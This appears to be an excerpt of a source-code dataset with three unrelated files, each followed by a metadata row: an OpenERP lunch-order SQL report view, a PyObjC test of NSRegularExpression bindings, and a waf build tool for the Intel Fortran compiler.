    _columns = {
        'date': fields.date('Date Order', readonly=True, select=True),
        'year': fields.char('Year', size=4, readonly=True),
        'month':fields.selection([('01','January'), ('02','February'), ('03','March'), ('04','April'),
            ('05','May'), ('06','June'), ('07','July'), ('08','August'), ('09','September'),
            ('10','October'), ('11','November'), ('12','December')], 'Month', readonly=True),
        'day': fields.char('Day', size=128, readonly=True),
        'user_id': fields.many2one('res.users', 'User Name'),
        'price_total':fields.float('Total Price', readonly=True),
        'note' : fields.text('Note', readonly=True),
    }
    _order = 'date desc'

    def init(self, cr):
        """(Re)create the report_lunch_order_line SQL view.

        Groups lunch_order_line rows by (date, user, note) and sums the
        price of the joined lunch_product rows into price_total.
        """
        tools.drop_view_if_exists(cr, 'report_lunch_order_line')
        cr.execute("""
            create or replace view report_lunch_order_line as (
               select
                   min(lo.id) as id,
                   lo.user_id as user_id,
                   lo.date as date,
                   to_char(lo.date, 'YYYY') as year,
                   to_char(lo.date, 'MM') as month,
                   to_char(lo.date, 'YYYY-MM-DD') as day,
                   lo.note as note,
                   sum(lp.price) as price_total
            from
                   lunch_order_line as lo
                   left join lunch_product as lp on (lo.product_id = lp.id)
            group by
                   lo.date, lo.user_id, lo.note
            )
            """)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
ariabuckles/pyobjc-framework-Cocoa | PyObjCTest/test_nsregularexpression.py | 3 | 1868 | from PyObjCTools.TestSupport import *
from Foundation import *
class TestNSRegularExpression (TestCase):
    """Checks the PyObjC bindings for NSRegularExpression / NSDataDetector:
    the 10.7 enum constants and the metadata of methods with out-arguments
    and block callbacks."""

    @min_os_level('10.7')
    def testConstants10_7(self):
        # All three enums (options, matching options, matching flags) are
        # bitmasks; each constant must be the matching single-bit value.
        self.assertEqual(NSRegularExpressionCaseInsensitive, 1 << 0)
        self.assertEqual(NSRegularExpressionAllowCommentsAndWhitespace, 1 << 1)
        self.assertEqual(NSRegularExpressionIgnoreMetacharacters, 1 << 2)
        self.assertEqual(NSRegularExpressionDotMatchesLineSeparators, 1 << 3)
        self.assertEqual(NSRegularExpressionAnchorsMatchLines, 1 << 4)
        self.assertEqual(NSRegularExpressionUseUnixLineSeparators, 1 << 5)
        self.assertEqual(NSRegularExpressionUseUnicodeWordBoundaries, 1 << 6)

        self.assertEqual(NSMatchingReportProgress, 1 << 0)
        self.assertEqual(NSMatchingReportCompletion, 1 << 1)
        self.assertEqual(NSMatchingAnchored, 1 << 2)
        self.assertEqual(NSMatchingWithTransparentBounds, 1 << 3)
        self.assertEqual(NSMatchingWithoutAnchoringBounds, 1 << 4)

        self.assertEqual(NSMatchingProgress, 1 << 0)
        self.assertEqual(NSMatchingCompleted, 1 << 1)
        self.assertEqual(NSMatchingHitEnd, 1 << 2)
        self.assertEqual(NSMatchingRequiredEnd, 1 << 3)
        self.assertEqual(NSMatchingInternalError, 1 << 4)

    @min_os_level('10.7')
    def testMethods10_7(self):
        # 'error' parameters must be marked as by-reference out-arguments,
        # and the enumerate... callback as a block with the expected signature.
        self.assertArgIsOut(NSRegularExpression.regularExpressionWithPattern_options_error_, 2)
        self.assertArgIsOut(NSRegularExpression.initWithPattern_options_error_, 2)
        self.assertArgIsBlock(NSRegularExpression.enumerateMatchesInString_options_range_usingBlock_,
                3, b'v@' + objc._C_NSUInteger + b'o^' + objc._C_NSBOOL)

        self.assertArgIsOut(NSDataDetector.dataDetectorWithTypes_error_, 1)
        self.assertArgIsOut(NSDataDetector.initWithTypes_error_, 1)

if __name__ == "__main__":
    main()
| mit |
abantam/pmtud | .waf-1.7.13-5a064c2686fe54de4e11018d22148cfc/waflib/Tools/ifort.py | 330 | 1460 | #! /usr/bin/env python
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import re
from waflib import Utils
from waflib.Tools import fc,fc_config,fc_scan,ar
from waflib.Configure import conf
@conf
def find_ifort(conf):
	"""Locate the Intel Fortran compiler, record its version and set FC_NAME."""
	fc=conf.find_program('ifort',var='FC')
	fc=conf.cmd_to_list(fc)
	conf.get_ifort_version(fc)
	conf.env.FC_NAME='IFORT'
@conf
def ifort_modifier_cygwin(conf):
	"""Cygwin support for ifort has not been written; always fails."""
	raise NotImplementedError("Ifort on cygwin not yet implemented")
@conf
def ifort_modifier_win32(conf):
	"""Apply the generic win32 Fortran configuration tweaks for ifort."""
	fc_config.fortran_modifier_win32(conf)
@conf
def ifort_modifier_darwin(conf):
	"""Apply the generic darwin Fortran configuration tweaks for ifort."""
	fc_config.fortran_modifier_darwin(conf)
@conf
def ifort_modifier_platform(conf):
	"""Dispatch to the OS-specific ifort modifier method, if one exists."""
	target_os=conf.env['DEST_OS']or Utils.unversioned_sys_platform()
	modifier=getattr(conf,'ifort_modifier_'+target_os,None)
	if modifier:
		modifier()
@conf
def get_ifort_version(conf,fc):
	"""Run `ifort --version` and store (major, minor) in conf.env['FC_VERSION'].

	ifort may print its banner on stdout or stderr, so both streams are
	searched; a fatal configuration error is raised when no version is found.
	"""
	version_re=re.compile(r"ifort\s*\(IFORT\)\s*(?P<major>\d*)\.(?P<minor>\d*)",re.I).search
	cmd=fc+['--version']
	out,err=fc_config.getoutput(conf,cmd,stdin=False)
	if out:
		match=version_re(out)
	else:
		match=version_re(err)
	if not match:
		conf.fatal('cannot determine ifort version.')
	k=match.groupdict()
	# NOTE: major/minor are kept as strings (regex group values)
	conf.env['FC_VERSION']=(k['major'],k['minor'])
def configure(conf):
	"""Waf entry point: find ifort and xiar, then set up the Fortran flags."""
	conf.find_ifort()
	conf.find_program('xiar',var='AR')
	conf.env.ARFLAGS='rcs'
	conf.fc_flags()
	conf.fc_add_flags()
	conf.ifort_modifier_platform()
| gpl-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.